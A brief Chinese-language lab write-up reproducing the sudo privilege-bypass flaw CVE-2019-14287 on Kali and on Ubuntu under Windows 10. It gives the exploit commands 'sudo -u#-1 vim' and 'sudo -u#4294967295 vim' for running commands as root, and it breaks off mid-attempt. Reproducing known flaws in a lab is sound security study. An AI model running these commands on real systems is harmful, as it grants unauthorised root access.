CVE-2019-14287:sudo 权限绕过漏洞(复现
参考:Ms08067安全实验室
实验环境
kali
win10
影响范围
sudo 1.8.28之前的所有版本
复现过程
首先,检查sudo的版本:
之后创建一个新用户:
useradd test
passwd test
在/etc/sudoers中插入
然后,切换用户为test
su test
之后就可以通过vim来进行权限绕过。
输入sudo -u#-1 vim或sudo -u#4294967295 vim
进入vim
再进行命令执行
同样,可以执行其他命令(以root的身份)
win10上的尝试
现在,在win10上也可以装Ubuntu:
它提供的身份并不是root的,而且也无法sudo切换到root(因为你根本不知道administrator的密码)。
我们尝试用这个漏洞来进行权限绕过: